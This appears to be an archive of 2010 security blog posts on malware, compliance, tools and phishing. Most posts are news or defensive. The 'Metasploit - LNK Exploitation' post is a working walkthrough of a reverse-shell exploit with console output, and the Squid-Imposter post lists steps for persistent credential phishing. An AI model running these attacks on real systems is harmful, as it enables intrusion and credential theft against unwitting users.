Top 5 Malware Threats of 2010

2011-01-07T07:06:00.000-08:00

1 - STUXNET - STUXNET was the hottest topic for 2010 when it comes to malware. Reversing STUXNET uncovered 4 zero-day exploits for vulnerabilities in the Microsoft windows operating system. While it was believed to be the first known malware to target the controls at industrial facilities such as power plants, this worm has successfully infected hundreds of thousands of computers on the Internet.

Here are the 4 vulnerabilities targeted by STUXNET:

- Microsoft Security Bulletin MS10-046
- Microsoft Security Bulletin MS10-061
- Microsoft Security Bulletin MS08-067
- Microsoft Security Bulletin MS10-073

2 - TDL4 - TDL4 is the latest version of a rootkit originally known as TDSS or Tidserv, which appeared back in 2008. However, unlike its predecessors, TDL4 is able to bypass code signing protection in 64-bit versions of Windows Vista and 7. By default these systems do not allow drivers that are not digitally signed to be loaded, but TDL4 manages to get around that by changing boot options before the operating system actually starts. TDSS is one of the most complex and dangerous malicious programs family in the world and it continues to evolve.

3 - Asprox - Asprox is a small botnet that has been used in password stealing, spam propagation, and phishing attacks. This botnet based attack is innovative by interfacing with Google’s search engine to locate vulnerable web pages. When a weakness is found, Asprox injects an iFrame based redirectional link on a vulnerable website in order to spread various types of malware.

4 - ZeuS 2.0 - ZEUS Botnet is still active in 2010. This trojan steals data from infected computers via web browsers and protected storage. Once infected, the computer sends the stolen data to a bot command and control (C&C) server, where the data is stored. ZeuS is sold in the criminal underground as a kit for around $3000-4000, and is likely the one malware most utilized by criminals specializing in financial fraud.

5 - Trojan Proxies - This type of malware turns the victim’s computer into a proxy server. This gives the attacker the opportunity to remotely perform malicious activity through your computer.

Squid-imposter: Phishing websites forever with HTML5 offline cache

2010-12-18T19:11:00.000-08:00

Attack and Defense Labs created a tool called Imposter to perform Browser Phishing attacks.

"Imposter is a flexible framework to perform Browser Phishing attacks. Once the system running Imposter is configured as the DNS server to the victims, the internal DNS server of Imposter resolves all DNS queries to itself. When the victim tries to access any website the domain resolves to the system running Imposter and Imposter’s internal web server serves content to the victim. Depending on the configuration appropriate payloads are sent to the victim. Data stolen from the victim is sent back to Imposter and this is stored in a SQLite database in a folder created with its name based on the date and time of the attack."

Imposter was designed for Windows operating systems and contains a module that uses HTML5 offline cache to store the payload permanently in all supporting browsers. On December 16, 2010, a new tool, called Squid-Imposter, was released that uses the HTML5 offline cache storage functionality was ported to Linux.

"Squid-imposter makes it easy to create Squid-based proxy injecting your own content to chosen website URLs. Modified content is then persisted in client's browser even when the client no longer connects through your proxy thanks to HTML5 Offline cache features. Additionally, standard HTTP cache headers set the page to cache for 10 years. Injected content may for example be used to form a phishing attack during penetration test."

So, now you can easily spoof websites that will be stored in victim’s browser cache forever. It’s a MITM/sidejacking attack technique by pretending to be that website. Here is an example of how Squid-Imposter can be used:

Choose a website URL you’d like to spoof (e.g. GMail login page)
Prepare a modified version of the page (e.g with a submit button that also sends login/password to you)
Look for any other URL on the domain that user won’t be likely to visit (this will be the manifest URL). It might something tiny like a blank.gif file.
Setup Squid-imposter with payloads and URLs
Convince a victim to connect to squid-imposter (e.g. hijack victim’s proxy entries, make him connect to your rogue Wi-Fi, etc.)
When victims enters the URL, squid returns the modified page and a manifest file that tells user to store the page in offline cache.
Two years later, the user is no longer connected to your proxy, but the modified page is still served by victim’s browser.

For information on HTML5 security:

Federal Risk and Authorization Management Program (FedRAMP)

2010-11-04T08:51:00.000-07:00

FedRAMP Released

The Federal Risk and Authorization Management Program or FedRAMP has been established to provide a standard approach to Assessing and Authorizing (A&A) cloud computing services and products.

FedRAMP allows joint authorizations and continuous security monitoring services for Government and Commercial cloud computing systems intended for multi-agency use.

Joint authorization of cloud providers results in a common security risk model that can be leveraged across the Federal Government. The use of this common security risk model provides a consistent baseline for Cloud based technologies. This common baseline ensures that the benefits of cloud-based technologies are effectively integrated across the various cloud computing solutions currently proposed within the government. The risk model will also enable the government to "approve once, and use often" by ensuring multiple agencies gain the benefit and insight of the FedRAMP's Authorization and access to service provider’s authorization packages.

FedRAMP Security Requirements: Tailored NIST SP 800-53 R3 controls and enhancements for Low and Moderate impact Cloud systems. Heightened security requirements from NIST SP 800-53 R3 baseline address issues of multi-tenancy, shared resource pooling, lack of trust, visibility, and control of the service provider’s infrastructure.

FedRAMP Process Guide: This guide is based on the NIST Risk Management Framework (RMF) in NIST SP 800-37 R1. This document will be one stop shop for all FedRAMP processes and templates. It is designed to assist the service providers by outlining a process to achieve authorization from FedRAMP. The guide outlines in sufficient detail

FedRAMP process workflow
List of deliverables/artifacts required for FedRAMP Authorization
Security guidance and requirements
Assessment/Test procedures to be used for assessing the packages
Acceptable Risk criteria for FedRAMP
Key activities in managing enterprise-level risk through a system life cycle perspective including continuous monitoring.

FedRAMP Authorization Request Process: List of criteria that FedRAMP office will use to begin processing the system for FedRAMP authorization

FedRAMP PIA template: This template needs to be completed by the service providers to demonstrate their approach on protecting customer’s PII data.

Standard Contract clauses and SLA’s: Mandatory FedRAMP contract clauses and SLA’s to be used by the Agency requesting FedRAMP authorization in their contract with the cloud service provider.

Download the Full Document

Sidejacking Tool

2010-11-01T18:57:00.000-07:00

Have you heard of sidejacking? It was presented at Blackhat in 2007 by Robert Graham. Here is a description from the Errata Security website:

"To recap: websites typically encrypt your password so it cannot be sniffed, but then send you an unencrypted "session-id" for that session. The session-id is either some random data in the URL, or more often, random data in an HTTP cookie. A hacker who sniffs the session-id can then use it to gain access to that session, which usually means gaining access to the account. Thus, the hacker can read your Gmail/HotMail/YahooMail, look at what books you've ordered from Amazon.com, control your MySpace/Facebook page, and so on. The hacker still cannot get your password nor your credit card number, but can most everything else."

At Toorcon 12 a new tool was released, Firesheep, which is a Firefox extension designed to demonstrate just how serious the sidejacking problem is. After installing the extension, connect to any busy open wifi network and click the big "Start Capturing" button. As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed. Double-click on someone, and you're instantly logged in as them. It is that easy!!!

Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.

Download and use this tool to test the security of your websites to ensure that you are providing the right protection for your website users!

Nessus Plug-In for Metasploit

2010-09-29T09:09:00.000-07:00

Zate Berg has contributed a plug-in for controlling Nessus from inside msfconsole this week. The plug-in is now part of the Development Branch of the project and several patches have been submitted by the author since it has been added so make sure that you keep your SVN updated.

msf > load nessus

[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus

msf > nessus_help

[+] Nessus Help
[+] type nessus_help for help with specific commands

Command Help Text
------- ---------

Generic Commands
----------------- -----------------
nessus_connect Connect to a nessus server
nessus_logout Logout from the nessus server
nessus_help Listing of available nessus commands
nessus_server_status Check the status of your Nessus Server
nessus_admin Checks if user is an admin
nessus_server_feed Nessus Feed Type
nessus_find_targets Try to find vulnerable targets from a report

Reports Commands
----------------- -----------------
nessus_report_list List all Nessus reports
nessus_report_get Import a report from the nessus server in Nessus v2 format
nessus_report_hosts Get list of hosts from a report
nessus_report_host_ports Get list of open ports from a host from a report
nessus_report_host_detail Detail from a report item on a host

Scan Commands
----------------- -----------------
nessus_scan_new Create new Nessus Scan
nessus_scan_status List all currently running Nessus scans
nessus_scan_pause Pause a Nessus Scan
nessus_scan_pause_all Pause all Nessus Scans
nessus_scan_stop Stop a Nessus Scan
nessus_scan_stop_all Stop all Nessus Scans
nessus_scan_resume Resume a Nessus Scan
nessus_scan_resume_all Resume all Nessus Scans

Plugin Commands
----------------- -----------------
nessus_plugin_list Displays each plugin family and the number of plugins
nessus_plugin_family List plugins in a family
nessus_plugin_details List details of a particular plugin

User Commands
----------------- -----------------
nessus_user_list Show Nessus Users
nessus_user_add Add a new Nessus User
nessus_user_del Delete a Nessus User
nessus_user_passwd Change Nessus Users Password

Policy Commands
----------------- -----------------
nessus_policy_list List all policies
nessus_policy_del Delete a policy

REMnux: A Linux Distribution for Reverse-Engineering Malware

2010-09-08T22:05:00.000-07:00

REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that's listening on the appropriate ports.

REMnux is also useful for analyzing web-based malware, such as malicious JavaScript, Java programs, and Flash files. It also has tools for analyzing malicious documents, such as Microsoft Office and Adobe PDF files, and utilities for reversing malware through memory forensics. In these cases, malware may be loaded onto REMnux and analyzed directly on the REMnux system without requiring other systems to be present in the lab.

REMnux does not aim to include all malware analysis tools in existence. Many of these tools are designed to work on Windows, and investigators prefer to use Windows systems for running such tools. If you are interested in running Windows analysis tools on a Linux platform, take a look at the Zero Wine project

If you are looking for a more full-featured Linux distribution focused on forensic analysis, take a look at SANS Investigative Forensic Toolkit (SIFT) Workstation

URL Scanner added to VirusTotal

2010-08-23T07:57:00.000-07:00

VirusTotal is a service that analyzes suspicious files and URLs enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by antivirus engines and web analysis toolbars.

VirusTotal recently underwent some major changes: a new vtuploader utility that supports multiple uploads as well as a larger upload size (20 Mb). Developers can also directly query VirusTotal with the new API that allows you to upload files via email and receive the scan results in your mailbox. The files are uploaded as email attachments and the results can be received either in plain text or XML.

The files sent via email have a lower priority, therefore, the scan results will not always be sent back immediately. Another great new feature to VirusTotal is URL scanning. You can now verify if a site is safe before visiting it.

Exposing Email Phishing Scams

2010-08-18T13:14:00.000-07:00

From the Symantec "State of Spam & Phishing Report - July 2010" report:

"The overall phishing numbers increased approximately 25 percent this month. This increase was attributed to nearly all sectors of phishing. Phishing websites created by automated toolkits doubled with an increase of 123 percent from May.

Unique URLs have increased by 12 percent from the previous month. Phishing websites with IP domains (for e.g. domains like http://255.255.255.255) was the only sector to have decreased by about 2 percent from May. Webhosting services comprised 11 percent of all phishing, an increase of 26 percent from previous month.

The number of non-English phishing sites increased by 15 percent. Among non-English phishing sites, French and Italian continued to be higher in June. Phishing in French in-creased by 25 percent mainly in the E-commerce sector."

Looking for examples of phishing emails for your organization security awareness training? Check out a new website called phishingemails.com. There are a number of great real-world phishing emails that can be used to raise awareness within your organization.

McAfee Security Journal Summer 2010 Edition

2010-08-10T09:46:00.000-07:00

This issue of the McAfee Security Journal issues a “call to arms” and challenge to our industry and its most basic assumptions and values. The tools and techniques of cybercrime continue to grow in number and sophistication at alarming rates. The cybercriminals prosper as they never have before because they have very little reason to fear the consequences. Maybe this is because we have really never given them a reason to fear.

This must change. We must adapt our industry at its core and at all levels. It is time to send the security industry on the offensive.

OpenFISMA 2.8.0

2010-08-10T09:14:00.000-07:00

The OpenFISMA project is an open source application designed to reduce the complexity and automate the regulatory requirements of the Federal Information Security Management Act (FISMA) and the National Institute of Standards and Technology (NIST) Risk Management Framework (RMF).

Features

Track security weaknesses to closure

OpenFISMA provides a proven business process for tracking the remediation of security weaknesses. This business process enforces quality controls and segregation of duty, pulling together individuals from different areas of the organization to plan, execute, and review all remediation actions.

Role-based access control

Access control is based on roles; each role has fine-grained access to certain privileges on each information system that is being tracked. The roles are completely customizable.

Active Directory/OpenLDAP Authentication

Authentication in OpenFISMA can be handled by any LDAP-compatible service, such as Microsoft Active Directory (AD) or OpenLDAP, in order to provide single sign-on convenience for your agency's users.

Scan Injection

If you run automated scans as part of your C&A process or as part of a continuous monitoring program, you can upload your scan results in XML format directly into OpenFISMA. OpenFISMA uses the information in scans to create new findings, assess risk exposure, and even update your asset inventory.
The scan injection provides some smarts, too. OpenFISMA matches new scan results against past scan results. Based on a simple set of rules, it decides whether to supress duplicate findings or to flag multiple, similar findings for human review. This reduces the overhead of redundant findings and can also help your organization identify systemic weaknesses that could be addressed more efficiently at the enterprise level.

E-mail Notifications

OpenFISMA sends notifications directly to users' inboxes when action is needed from them. This automated notification system relieves security managers of the burden of manually monitoring the workflow. The notification system also reduces turn-around time by alerting users quickly when their action is needed.

Rich Text Editing

Data about findings is entered using a rich text editor that allows for formatting (bold, italics, underline, and outline formats) as well as spell checking.

Plug-in Reports

Reporting is one of the most critical requirements for any process management tool. OpenFISMA provides the ability to "plug in" a report without writing any code. These reports are created by writing SQL and updating a configuration file. OpenFISMA then creates the interface and data export features on-the-fly. The plug-in architecture drastically reduces the cost and time involved in creating custom reports.

NIST SP 800-53 Rev. 2

OpenFISMA contains many of the NIST SP 800-53 security controls required for a FIPS-199 "high" impact information system. This helps you get your OpenFISMA instance authorized to operate quickly. The built-in controls include system use notification, rules of behavior, electronic privacy policy (p3p), and many, many more.
OpenFISMA also contains a catalog of all NIST SP 800-53 Rev. 2 controls built-in. Findings in OpenFISMA can be matched against these security controls to provide supplemental information for remediation and planning. The catalog includes descriptions of the controls, scoping, and supplemental guidance.

Wireshark Network Analysis Book

2010-08-06T10:55:00.000-07:00

Wireshark is undeniably the world's most popular network analyzer with over 500,000 downloads per month.

Wireshark Network Analysis is the result of over 20 years of packet-level analysis and troubleshooting. At 800-pages, Wireshark Network Analysis is the ultimate reference guide focusing on Wireshark functionality as well as TCP/IP traffic interpretation.

Learn the most efficient methods for capturing wired and wireless traffic
Identify the cause of poor performance and stop the finger pointing
Use Wireshark charts and graphs to "draw a picture" of network behavior
Customize Wireshark for more efficient troubleshooting and security analysis
Build advanced filters to identify unusual traffic patterns caused by poorly performing network devices and applications, network scans and breached hosts

Cloutage.org - An Open Security Foundation Project

2010-08-05T15:38:00.000-07:00

Cloutage was founded in April 2010 and exists to empower organizations by providing cloud security knowledge and resources so that they may properly assess information security risks. The project aims to document known and reported incidents with cloud services while also providing a one-stop shop for cloud security news and additional resources.

The Open Security Foundation feels that there is a distinct need for tools and information that provide unbiased, high quality data regarding cloud security and services. There are no other open resources available that facilitate research into this subject matter. By providing this sort of resource, we feel we can help accomplish the following:

Improve awareness of cloud security issues
Provide accurate statistics to CSO's and CTO's to assist them in decision making
Gain a better understanding of service levels and outage impacts
Provide a centralized resource for cloud security and related topics

Check Your Facebook Privacy Settings Now!

2010-08-03T15:10:00.000-07:00

It has been reported: "Much has been made of a recent Facebook "leak" which allegedly disclosed information on over 100 million Facebook users. What some reports have failed to highlight, however, is that the information was already public to begin with.

Security researcher Ron Bowes wrote a Ruby script that downloads information from Facebook's user directory, a searchable index of public profile pages. The directory does not expose a user's entire profile and only exposes information that the user has allowed Facebook to make public. This includes names, profile images, and small sampling of the user's friends. Users can opt out of inclusion in the search, but could potentially still appear on the directory page of a friend who is searchable.

Bowes got the idea of spidering the data so that he could collect statistics about the most common names. Such statistical information isn't sensitive at all and doesn't pose any security threat to Facebook users. The data could be useful, however, for building automated account cracking software that is generic and not specific to Facebook. This is because a list of the most common names can be used to assemble a good dictionary of potentially popular usernames for use in brute-force tools that attempt to identify and crack user accounts.

This incident doesn't represent a breach of Facebook's security, because the information is made public by design. It highlights, however, the importance of keeping an eye on your social networking privacy settings and understanding how your personal information is used. Many users might not realize that their names and photos are accessible in Facebook's public user directory."

Check your Facebook privacy options by going to Account and then Privacy Settings. Review your settings in the following areas:

Basic Directory Information
Sharing on Facebook
Applications and Websites

Facebook provides an easy to understand tutorial on their privacy controls.

2010-08-03T10:55:00.000-07:00

A report was published last week highlighting the source and cause of over 900 data breaches over the last six years compromising 900 million sensitive records.

Highlights of Report:

The majority of data breaches came from servers where the main databases were held (98%)
48% of data breaches occurred because of Privileged User misuse on the databases by trusted individuals
The event logs within servers and databases are not being monitored and mined for sources of information on data breaches. 86% of victims of data breaches had evidence of the breach sitting in the logs files of their databases but no one had taken the time to look for them
User accounts were not being audited. Activity of Privileged User accounts must be monitored and alerts must be generated on misuse. Management must be notified on any potential data breaches being perpetrated within the organization

Mitigation Strategies from Report:

Restrict and monitor Privileged User activity
Watch for minor policy violations
Implement measures to thwart stolen credentials
Monitor and filter egress network traffic
Review and Modify your approach to event monitoring and log analysis, and
Share incident information

Hijack Hunter

2010-08-03T08:26:00.000-07:00

Hijack Hunter is an application that thoroughly scans your computer and displays all the gathered data in a comprehensive way. To help the users to detect suspicious system behaviors, our product shows all the needed information in a report file, taking care of all details, on running processes, registry startups keys, drivers installed, windows hijacks, browser helper objects and much more.

It is possible for the users to list files in custom folders and to dump the registry data from custom registry keys and values.

Hijack Hunter can list all the executable files that are in suspicious folders commonly used by malware. The program displays also hidden files in suspicious folders, executable files in Temp Folder and system parameters that are commonly hijacked by recent malware and spyware.

Apache mod_antimalware

2010-07-30T15:39:00.000-07:00

This paper describes the technical architecture and implementation of mod_antimalware, a novel, open-source containment technology for web servers that can be used to:

Quarantine web-based malware infections before they impact users
Allow web pages to safely be served even while a site is infected
Give webmasters time to recover from an attack before their web sites get blacklisted by popular search engines and browsers

2010-07-27T09:48:00.001-07:00

NIST is developing Computer Forensic Reference Data Sets(CFReDS) for digital evidence. These reference data sets (CFReDS) provide to an investigator documented sets of simulated digital evidence for examination. Since CFReDS would have documented contents, such as target search strings seeded in known locations of CFReDS, investigators could compare the results of searches for the target strings with the known placement of the strings.

Investigators could use CFReDS in several ways including validating the software tools used in their investigations, equipment check out, training investigators, and proficiency testing of investigators as part of laboratory accreditation.

The CFReDS site is a repository of images. Some images are produced by NIST, often from the CFTT (tool testing) project, and some are contributed by other organizations. National Institute of Justice funded this work in part through an interagency agreement with the NIST Office of Law Enforcement Standards.

Inj3ct0r - Exploit Database

2010-07-26T21:23:00.001-07:00

I was bummed to see milw0rm go away. Then Offensive Security released their exploit database. Well, I found another resource, the inj3ct0r exploits and 0day exploits database.

"The ultimate archive of exploits and vulnerable software and a great resource for vulnerability researchers and security professionals.
Our aim is to collect exploits from submittals and various mailing lists and concentrate them in one, easy to navigate database.
This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. // r0073r"

Metasploit - LNK Exploitation

2010-07-26T08:36:00.000-07:00

If you are not already aware of it, (won't say anything if you are a security professional and did not know), Metasploit added a module for the LNK vulnerability over a week ago.

Here is a demonstration on HOW EASY it is to use it. I will not go into detail on how to get the end user to use to browse it and will leave that up to you.

Update your metasploit to the latest svn version and open it up:

$ msfconsole

Choose the exploit module:

msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute

Choose the payload. I’m going to use a reverse_tcp shell..
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp

msf exploit(ms10_xxx_windows_shell_lnk_execute) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 80 yes The daemon port to listen on (do not change)
URIPATH / yes The URI to use (do not change).

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique: seh, thread, process
LHOST yes The listen address
LPORT 4444 yes The listen port
SRVHOST is going to be your local IP address
LHOST is also going to be your local IP address.. you don’t have to change anything else.

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set lhost 192.168.0.58
lhost => 192.168.0.58
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set srvhost 192.168.0.58
srvhost => 192.168.0.58
msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.58:4444
[*]
[*] Send vulnerable clients to \\192.168.0.58\MSaq\
[*]
[*] Using URL: http://192.168.0.58:80/
[*] Server started.
msf exploit(ms10_xxx_windows_shell_lnk_execute) >

Now all you have to do is get a user to browse to it.
[*] Responding to WebDAV OPTIONS request from 192.168.0.252:1101
[*] Responding to WebDAV OPTIONS request from 192.168.0.252:1101
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq
[*] Sending 301 for /MSaq …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/
[*] Sending directory multistatus for /MSaq/ …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq
[*] Sending 301 for /MSaq …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/
[*] Sending directory multistatus for /MSaq/ …[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq
[*] Sending 301 for /MSaq …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/
[*] Sending directory multistatus for /MSaq/ …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/desktop.ini
[*] Sending 404 for /MSaq/desktop.ini …
[*] Sending LNK file to 192.168.0.252:1101 …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/DXdrUxgc.dll.manifest
[*] Sending 404 for /MSaq/DXdrUxgc.dll.manifest …[*] Sending DLL payload 192.168.0.252:1101 …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/DXdrUxgc.dll.123.Manifest
[*] Sending 404 for /MSaq/DXdrUxgc.dll.123.Manifest …
[*] Sending stage (240 bytes) to 192.168.0.252
[*] Command shell session 1 opened (192.168.0.58:4444 -> 192.168.0.252:1111) at Tue Jul 20 13:09:03 -0500 2010
sessions

Active sessions
===============

Id Type Information Connection
— —- ———– ———-
1 shell 192.168.0.58:4444 -> 192.168.0.252:1111

msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -i 1
[*] Starting interaction with 1…

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>

USBSploit

2010-07-24T23:09:00.000-07:00

USBsploit is a tool that is still in beta version and has been created by an Infosec researcher and owner of the popular portal Secubsimage.

This tool makes it simple for any person wanting to dump files from remote USB drives on multiple targets at the same time. It works through Meterpreter sessions with a light (24MB) modified version of Metasploit. The interface is a modified version of SET.

Feature Additions to USBsploit:

Inject a malicious VBS script into the XLS files available on the remote USB keys by uploading and executing the XLSinjector tool
Upload and execute a modified version of USBDumper 0.2 to the targets. Injecting a malicious VBS script into XLS and DOC files available on the remote USB keys
Launch an Autorun attack by uploading malicious files (autorun.inf, autorun.ico and usbsploitBackdoor.exe) on the remote USB keys
Target the USB U3 keys
Target the PDF files available on the remote USB keys with various attacks
Reintegrate the features of SET to spread the Backdoors

Check out the POC video!

Shell of the Future – Reverse Web Shell Handler for XSS Exploitation

2010-07-21T09:10:00.000-07:00

"Cross-site Scripting is an interesting vulnerability. It is relatively easier to discover in a Penetration test but demonstrating its impact has always been tricky. So tricky in fact that it has pushed one of the most creative groups of people in IT (Penetration testers) in to using the most boring and misleading POC possible. Yes, you guessed it right, the ubiquitous JavaScript alert() box. To break the monotonousness testers sometimes change the message being displayed but that’s as far as it usually goes. It also has the nasty side effect of developers blocking the word ‘alert’ in their code while ‘eval’ is let through.

In pentests XSS is usually considered as a dead-end vulnerability - you discover it, take a screenshot and move on to something else. It cannot be exploited and used as a stepping stone to another attack because exploiting it would require attacking a user and that is something Penetration testers aren’t allowed to do, the contract 9 out of 10 times only lets us attack the server or the application. That however does not stop the attackers from going so far as to taking over entire servers using a simple XSS in the real world.

The real impact of XSS is that an attacker can do anything that the user can do with his session. Today I am releasing a tool that would let you demonstrate this very impact with the same effort involved as showing the alert box. Ladies and Gentlemen, I give you - Shell of the Future.

Shell of the Future is a Reverse Web Shell handler. It’s the browser equivalent of a reverse command shell, instead of a command prompt from which you type in commands, you get to browse the victim’s HTTP/HTTPS session from your browser. Even though the site is being browsed from the pentester’s browser all the pages are fetched by the victim’s browser. This is done by tunneling HTTP over HTTP using HTML5 Cross Origin Requests. The hijacked session also displays a hovering banner over it which can be heavily customized, making it the perfect POC for your pentest report."

DENVER - Skimmers Siphoning Card Data at the Pump

2010-07-20T09:40:00.000-07:00

It is reported, "Thieves recently attached bank card skimmers to gas pumps at more than 30 service stations along several major highways in and around Denver, Colorado, the latest area to be hit by a scam that allows crooks to siphon credit and debit card account information from motorists filling up their tanks.

Forced to re-issue an unusually high number of bank cards due to fraudulent charges on the accounts, a regional bank serving Colorado and surrounding states recently began searching for commonalities among the victimized accounts. The financial institution, which shared information with KrebsOnSecurity.com on the condition that it not be named, found that virtually all of the compromised cardholders had purchased gas from one of a string of filling stations along or not far from Interstate 25, a major North-South highway that runs through the heart of Denver.

Thieves recently attached bank card skimmers to gas pumps at more than 30 service stations along several major highways in and around Denver, Colorado, the latest area to be hit by a scam that allows crooks to siphon credit and debit card account information from motorists filling up their tanks.

Several Valero stations along the I-25 corridor reached by phone acknowledged being visited over the past week by local police and U.S. Secret Service agents searching for skimmer devices. The stations declined to comment on the record, but said investigators left them with a bulletin stating that stations in the area had been targeted and urging them to be on the lookout for suspicious activity around the pumps.

The gas pumps compromised in the Denver-area attacks, showed no outward signs of having been tampered with or altered, according to several sources. My source at the bank said all of the pumps in question contained a device on the inside of the pumps designed to record data stored on the back of cards inserted into the compromised pumps, but he wasn’t sure whether the skimmers were designed to transmit the stolen data wirelessly.

My source said the hacked pumps in Denver tended to be on the outside edges of the gas station, those hardest to see by clerks in the station. In a wrinkle the could be part of an effort to drive customers to the compromised pumps, the source said customer service representatives at the bank also received complaints from victim account holders who reported getting phone calls promising them gift cards if they purchased gas at specific stations in the Denver area.

Unlike most skimmers affixed to ATMs — which can often be spotted because they rely on fraud devices that are attached to the exterior of the cash machines — gas station skimmers are planted after the thieves have gained access to the interior of the pumps. As result, there are rarely any signs that a gas pump has been compromised. However, consumers can and should keep a close eye on their monthly bank statements and report any unauthorized charges immediately.

Scan from a Xerox WorkCentre Pro

2010-07-20T09:27:00.000-07:00

Most corporations have a multi-function device called the WorkCentre Pro from Xerox. A recent 60-minutes story highlighted a old but still effective story on unprotected data residing on the hard drive of these types of systems. Well, another new social engineering attack has come to fruition using the Xerox scan to email function.

"Over the weekend, a "Scan from a Xerox WorkCentre Pro" themed malware campaign relying on zip archives, was actively spamvertised by cybecriminals seeking to infect gullible end/corporate users.

What's particularly interesting about this campaign, is the cocktail of malware dropped on infected hosts, including Asprox sample, and two separate samples of Antimalware Doctor."

A user will find the following email in their inbox:

-------------------------------------------------------------
- Sample subject: Scan from a Xerox WorkCentre Pro $9721130
- Sample message: "Please open the attached document. It was scanned and sent to you using a Xerox WorkCentre Pro.

Sent by: Guest
Number of Images: 1
Attachment File Type: ZIP [DOC]

WorkCentre Pro Location: machine location not set Device Name: XRX2090AA7ACDB45466972. For more information on Xerox products and solutions, please visit http://www.xerox.com"
-------------------------------------------------------------

Educate your users on this scam. If you have a comprehensive security program in place, this attack should be detectable and prevented.

Microsoft Zero-Day: Malformed Shortcut Vulnerability

2010-07-20T09:19:00.000-07:00

Today Microsoft updated the security advisory that was initially published last Friday (July 16), stating that they’re working on issuing a security patch for this vulnerability. Earlier, malware exploiting this issue was found in the wild.

From McAfee Labs:

1. What is the issue with .LNK files and how can it be exploited?
A. McAfee Labs researchers analyzed malware that was exploiting a design flaw in parsing shortcut (.LNK) files. This issue gets triggered because the Windows Shell component does not validate parameters sent out in the shortcut. This issue can be exploited via any mechanism that makes the user load the icon of the .LNK file.

2. Does the malware need a payload (shellcode) to exploit this flaw?
A. Since this is a design issue in the way shortcuts are parsed, no malicious payload (shellcode) is required to exploit this flaw. The .LNK file needs to point to a malicious file, the path of which needs to be hardcoded in the shortcut.

3. What are the requirements to successfully exploit this flaw?
A. This flaw can be triggered when Windows Explorer or Internet Explorer tries to render a malformed .LNK file that points to a malicious executable. The user need not double-click on the .LNK file to trigger the vulnerability; just opening the folder containing the malicious shortcut is enough to get infected.

4. What are the most likely attack vectors used to exploit this vulnerability?
A. USB drives are likely to be affected the most. The malware discovered in the wild was exploiting this issue via a USB drive. File sharing over SMB is another likely vector to exploit this flaw and this can lead to widespread malware infections over internal networks. WebDAV shares are equally susceptible to exploitation.

5. What are the affected platforms?
A. Microsoft has acknowledged that all supported platforms are affected. More details are available in the Microsoft security advisory. Windows XP SP2 is not listed in the list of affected platforms from Microsoft, so there is a chance of Windows XP SP2 users might remain vulnerable.

6. How widely is the issue being exploited?
A. The issue is known to be exploited by malware in the wild. Initial attacks were limited. However, an exploit module in metasploit was published today that uses WebDAV shares as an exploit vector. We expect wider exploitation of this issue. Users should keep their anti-virus software updated with the latest DATs (signatures).

SAS 70 is not proof of security, continuity or privacy compliance: Gartner

2010-07-17T11:49:00.000-07:00

Gartner has released a report on something that I have been advocating for some time. I have seen a recent trend with companies, especially in the Cloud computing business, referring to their SAS70 as a confirmation that they have implemented a comprehensive security program.

In summary, the Gartner report states that being SAS70 compliant does not mean a company or a product is secure! Compliancy is not a substitute for security but I firmly believe that a strong security program can bring a company into compliancy with the majority of regulations in existence.

"Statement on Auditing Standards (SAS) 70 is being misused by many vendors, and often their customers and certified public accountants (CPAs), in the hosted-application, software as a service (SaaS) and cloud computing spaces, according to Gartner, Inc.

Gartner analysts said SAS 70 is too often treated by vendors and their customers as a certification ‘proving’ security and compliance with privacy or other regulations that require enterprises to monitor their exposure to vendor risks.

"SAS 70 is basically an expensive auditing process to support compliance with financial reporting rules like the Sarbanes-Oxley Act (SOX)," said French Caldwell, research vice president at Gartner. "Chief information security officers (CISOs), compliance and risk managers, vendor managers, procurement professionals, and others involved in the purchase or sale of IT services and software need to recognize that SAS 70 is not a security, continuity or privacy compliance standard."

"Many providers of traditional application hosting, SaaS and cloud computing are currently treating SAS 70 as if it were a form of certification, which it is not," said Jay Heiser, research vice president at Gartner. "Furthermore, some claim that SAS 70 addresses security, privacy and continuity, which is misleading. Instead, it is only a generic guideline for the preparation, procedure and format of an auditing report. SAS 70 always places the onus on the service recipient, or more precisely, on the recipient's auditor, to ensure that all controls relevant to the recipient's requirements are examined."

"Given that SAS 70 cannot be considered as proof that an offered IT service is secure, it should be a matter of suspicion when a vendor insists that it is," Mr. Heiser said. "Vendor claims to be 'SAS 70 certified' indicate either ignorance or deception, neither of which is a good basis for trust. The only thing that can conclusively be said about having a SAS 70 Type II attestation is that an auditing firm has agreed that the service provider is effectively performing those controls that they paid the auditing firm to evaluate.""

Lessons Being Learned about Cloud Computing

2010-07-07T21:00:00.000-07:00

Looking for answers to these types of questions on cloud computing privacy and security from a legal perspective?

What makes cloud computing different from computing in-house or "normal" IT outsourcing?
What are the key benefits?
